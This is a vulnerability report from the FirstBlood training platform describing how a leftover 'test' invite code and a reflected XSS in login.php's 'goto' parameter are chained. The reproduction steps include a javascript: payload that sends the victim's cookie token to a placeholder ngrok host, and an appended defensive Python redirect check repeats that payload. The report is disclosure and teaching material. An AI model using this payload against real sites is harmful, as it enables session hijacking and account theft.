FirstBlood-#613[COLLAB] Can register as a doctor and steal token upon login.
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-26, amec0e Level 3 reported:

Hey mate,

I found that on the register.php endpoint we can register as a new doctor using an inviteCode with the value test. After registering as a new doctor and then clicking on a link to the login page from a malicious user, upon the doctor logging in via the endpoint login.php they will be sent to our ngrok address, where we can steal their drps= token via the parameter goto on the login endpoint.

Impact:

A user can register as a doctor using inviteCode=test; then, by following a link from a malicious user, we can steal the doctor's drps= token because of the lack of an HttpOnly flag on the drps cookie.

Steps to Reproduce:

  • Visit the endpoint register.php
  • Enter a username and in the invite code use test
  • Click register and you will now be given credentials.

Request:

Response:

  • Click "Continue to login"
  • Start our Ngrok server.
  • Append the following parameter to the login URL:
    ?goto=javascript:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
  • Replace your ngrok address in the payload and Press "Enter"
  • Now login with your new credentials and you will be redirected to your ngrok address.

NOTE: You will receive an error and maybe a 404; this is normal.

You will now see the token has been leaked to our ngrok address.

Remediation:

Update filtering to protect against javascript URI redirection.

Best regards,

Amec0e.

In Collaboration with thebinarybot

P2 High

This bug makes use of the following vulnerabilities in a chain:

  • Reflective XSS
  • Auth issues


FirstBlood ID: 39
Vulnerability Type: Reflective XSS

Our mistake: The parameter "goto" on login.php should have been "fixed" when redirecting to prevent XSS, but due to an oversight from Sean and Karl the new code did not make it into production. This has since been updated since the event ended and you're recommended to re-try. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.

FirstBlood ID: 24
Vulnerability Type: Auth issues

The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.
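The remediation suggested in the report and the "goto" fix described above amount to one check: the redirect target must be a plain local path, never a javascript: URI or an off-site address. The following is an added illustration in Python, not code from the FirstBlood application (which is PHP); the default landing page name is an assumption, and the rejected payload is the one from the report with a placeholder host.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

# Assumed default landing page; the real login.php target is not in the report.
DEFAULT_LANDING = "/dashboard.php"

# The payload from the report, with a placeholder collector host.
REPORTED_PAYLOAD = "javascript:window.location.href=`https://COLLECTOR.example/${document.cookie}`"


def safe_goto(goto: Optional[str], default: str = DEFAULT_LANDING) -> str:
    """Return a redirect target safe to use in a Location header or a
    client-side redirect. Anything that is not a root-relative path on this
    site (no scheme, no host, not protocol-relative, no control characters)
    is replaced by ``default``."""
    if not goto:
        return default
    original = goto.strip()
    # Validate the decoded form so %6Aavascript: or %2F%2Fhost cannot slip
    # past a check that only looks at the raw string.
    decoded = unquote(original).strip()
    # Control characters (tab/newline inside "java\tscript:") and backslashes
    # (which browsers normalise to "/") are never part of a legitimate path.
    if any(ord(c) < 0x20 or c == "\\" for c in decoded):
        return default
    # Both forms must be root-relative ("/x") but not protocol-relative ("//x").
    for form in (original, decoded):
        if not form.startswith("/") or form.startswith("//"):
            return default
    parts = urlsplit(decoded)
    # A scheme (javascript:, data:, https:) or a host means it is not local.
    if parts.scheme or parts.netloc:
        return default
    return original


if __name__ == "__main__":
    for candidate in (REPORTED_PAYLOAD, "//evil.example", "%2F%2Fevil.example",
                      "/\\evil.example", "/settings.php?tab=1"):
        print(f"{candidate!r:60} -> {safe_goto(candidate)}")
```

The drps cookie itself should additionally be issued with the HttpOnly flag, so that even a reflected script cannot read document.cookie; that change lives in the cookie-setting code, not in the redirect check.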